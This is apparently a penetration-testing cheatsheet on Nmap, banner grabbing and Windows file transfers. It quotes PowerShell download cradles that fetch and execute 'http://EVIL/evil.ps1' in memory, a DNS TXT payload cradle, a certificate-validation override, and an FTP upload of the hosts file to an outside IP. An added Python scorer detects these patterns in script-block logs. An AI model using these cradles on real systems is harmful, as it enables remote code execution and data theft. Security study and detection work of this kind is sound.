
# Cheatsheet

## Nmap

### Running an Nmap Script

```bash
nmap --script <SCRIPT_NAME> -p<PORT> <DOMAIN/IPADDRESS>
```

## Banner Grabbing

```bash
nmap -sV --script=banner <DOMAIN/IPADDRESS>
```

```bash
netcat <IP_ADDRESS> <PORT>
```

```bash
nc -nv <IP_ADDRESS> <PORT>
```

```bash
curl -IL <DOMAIN>
```

## Windows File Transfer Methods (Download Operations)

### PowerShell Base64 Encode & Decode

> Transferring a file from a Linux machine to a Windows machine by pasting its Base64 encoding

On Linux Machine

```bash
cat <FILE> | base64 -w 0;echo
```

On Windows Machine

```powershell
[IO.File]::WriteAllBytes("C:\<LOCATION>\<FILENAME>", [Convert]::FromBase64String("<BASE64>"))
```

### PowerShell Web Downloads

#### PowerShell DownloadFile Method

```powershell
(New-Object Net.WebClient).DownloadFile('<URL>','C:\<LOCATION>\<FILENAME>')
```

```powershell
(New-Object Net.WebClient).DownloadFileAsync('<URL>','C:\<LOCATION>\<FILENAME>')
```

#### PowerShell DownloadString - Fileless Method

> Executes the downloaded script directly in memory; nothing is written to disk

```powershell
IEX (New-Object Net.WebClient).DownloadString('<URL>')
```

```powershell
(New-Object Net.WebClient).DownloadString('<URL>') | IEX
```

#### PowerShell Invoke-WebRequest

Shorter aliases for `Invoke-WebRequest` in Windows PowerShell (`curl` and `wget` here are PowerShell aliases, not the Linux binaries)

```powershell
iwr
curl
wget
```

```powershell
Invoke-WebRequest <URL> -OutFile <FILENAME>
```

#### PowerShell Cradles

> From HarmJ0y, <https://gist.github.com/HarmJ0y/bb48307ffa663256e239>

```powershell
# normal download cradle
IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1")

# PowerShell 3.0+
IEX (iwr 'http://EVIL/evil.ps1')

# hidden IE com object
$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r

# Msxml2.XMLHTTP COM object
$h=New-Object -ComObject Msxml2.XMLHTTP;$h.open('GET','http://EVIL/evil.ps1',$false);$h.send();iex $h.responseText

# WinHttp COM object (not proxy aware!)
$h=new-object -com WinHttp.WinHttpRequest.5.1;$h.open('GET','http://EVIL/evil.ps1',$false);$h.send();iex $h.responseText

# using bitstransfer- touches disk!
Import-Module bitstransfer;Start-BitsTransfer 'http://EVIL/evil.ps1' $env:temp\t;$r=gc $env:temp\t;rm $env:temp\t; iex $r

# DNS TXT approach from PowerBreach (https://github.com/PowerShellEmpire/PowerTools/blob/master/PowerBreach/PowerBreach.ps1)
#   code to execute needs to be a base64 encoded string stored in a TXT record
IEX ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(((nslookup -querytype=txt "SERVER" | Select -Pattern '"*"') -split '"'[0]))))

# from @subtee - https://gist.github.com/subTee/47f16d60efc9f7cfefd62fb7a712ec8d
<#
<?xml version="1.0"?>
<command>
   <a>
      <execute>Get-Process</execute>
   </a>
  </command>
#>
$a = New-Object System.Xml.XmlDocument
$a.Load("https://gist.githubusercontent.com/subTee/47f16d60efc9f7cfefd62fb7a712ec8d/raw/1ffde429dc4a05f7bc7ffff32017a3133634bc36/gistfile1.txt")
$a.command.a.execute | iex
```

#### UseBasicParsing (for the "Internet Explorer engine is not available" error)

```powershell
Invoke-WebRequest <URL> -UseBasicParsing | IEX
```

#### Could not establish trust relationship (SSL/TLS certificate is not trusted)

```powershell
# Disables TLS certificate validation for the whole PowerShell session
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
```
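Added detection example (not part of this cheatsheet or HarmJ0y's gist): a Python scorer that flags the cradle patterns listed above and the certificate-validation override when they appear in PowerShell script block text, such as Event ID 4104 logs. The sample log lines, indicator names and weights are constructed for this example.

```python
import re
from typing import Dict, List, Tuple

# Indicator patterns distilled from the download cradles and the
# certificate-validation override listed above. Weights are constructed
# for this example, not a published scoring scheme.
INDICATORS: List[Tuple[str, str, int]] = [
    ("invoke-expression", r"\b(?:iex|invoke-expression)\b", 3),
    ("webclient-download", r"net\.webclient|\.download(?:string|file(?:async)?)\(", 3),
    ("invoke-webrequest", r"\b(?:iwr|invoke-webrequest)\b", 1),
    ("base64-decode", r"frombase64string", 2),
    ("com-http-object", r"msxml2\.xmlhttp|winhttp\.winhttprequest|internetexplorer\.application", 3),
    ("bits-transfer", r"start-bitstransfer", 2),
    ("dns-txt-lookup", r"nslookup\s+-querytype=txt", 3),
    ("remote-xml-load", r"\.load\(\s*['\"]https?://", 2),
    ("tls-validation-disabled", r"servercertificatevalidationcallback\s*=\s*\{\s*\$true\s*\}", 4),
]

def score_script_block(text: str) -> Dict[str, int]:
    """Count every indicator present in one script block (case-insensitive)."""
    lowered = text.lower()
    return {name: n for name, pat, _ in INDICATORS if (n := len(re.findall(pat, lowered)))}

def risk_score(text: str) -> int:
    """Sum the weight of each distinct indicator: a download alone scores low,
    a download combined with in-memory evaluation (IEX) scores high."""
    lowered = text.lower()
    return sum(w for _, pat, w in INDICATORS if re.search(pat, lowered))

def find_cradles(events: List[Dict[str, str]], threshold: int = 4) -> List[Tuple[str, int, List[str]]]:
    """Return (event_id, score, indicators) for events at or above threshold, highest first."""
    found = []
    for ev in events:
        s = risk_score(ev["script"])
        if s >= threshold:
            found.append((ev["id"], s, sorted(score_script_block(ev["script"]))))
    return sorted(found, key=lambda f: f[1], reverse=True)

# Constructed stand-ins for Event ID 4104 script block text: one benign admin
# command, one plain download, and three snippets taken from this page.
SAMPLE_EVENTS = [
    {"id": "e1", "script": "Get-ChildItem C:\\Users | Where-Object { $_.Name -like 'a*' }"},
    {"id": "e2", "script": 'IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1")'},
    {"id": "e3", "script": "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}"},
    {"id": "e4", "script": "Invoke-WebRequest https://example.invalid/tool.zip -OutFile tool.zip"},
    {"id": "e5", "script": "IEX ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("
                           "((nslookup -querytype=txt \"SERVER\" | Select -Pattern '\"*\"') -split '\"'[0]))))"},
]

if __name__ == "__main__":
    for event_id, score, names in find_cradles(SAMPLE_EVENTS):
        print(f"{event_id}: score={score} indicators={', '.join(names)}")
```

The plain `Invoke-WebRequest -OutFile` download (e4) stays below the threshold on purpose: on its own it is routine admin activity, and the signal worth alerting on is the combination with in-memory evaluation, COM HTTP objects, DNS TXT lookups or a disabled certificate check.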

### SMB Downloads

#### No Authentication

On Linux, create SMB Server

```bash
sudo impacket-smbserver share -smb2support /tmp/smbshare
```

On Windows, copy the file from SMB Server

```powershell
copy \\<IPADDRESS>\share\<FILENAME>
```

#### With Authentication

On Linux, create SMB Server with username and password

```bash
sudo impacket-smbserver share -smb2support /tmp/smbshare -user test -password test
```

On Windows, mount SMB Server with username and password

```powershell
net use n: \\<IPADDRESS>\share /user:<USERNAME> <PASSWORD>
```

```powershell
copy n:\<FILENAME>
```

### FTP Downloads

#### Using pyftpdlib

On Linux, set up FTP Server

```bash
sudo pip3 install pyftpdlib
sudo python3 -m pyftpdlib --port 21
```

On Windows, transfer files from FTP Server using PowerShell

```powershell
(New-Object Net.WebClient).DownloadFile('ftp://<IPADDRESS>/<FILENAME>', 'C:\<LOCATION>\<FILENAME>')
```

#### Create a Command File for the FTP Client and Upload the Target File (the `PUT` below sends the file to the server)

```
C:\htb> echo open 192.168.49.128 > ftpcommand.txt
C:\htb> echo USER anonymous >> ftpcommand.txt
C:\htb> echo binary >> ftpcommand.txt
C:\htb> echo PUT c:\windows\system32\drivers\etc\hosts >> ftpcommand.txt
C:\htb> echo bye >> ftpcommand.txt
C:\htb> ftp -v -n -s:ftpcommand.txt
ftp> open 192.168.49.128

Log in with USER and PASS first.


ftp> USER anonymous
ftp> PUT c:\windows\system32\drivers\etc\hosts
ftp> bye
```

## Windows File Transfer Methods (Upload Operations)

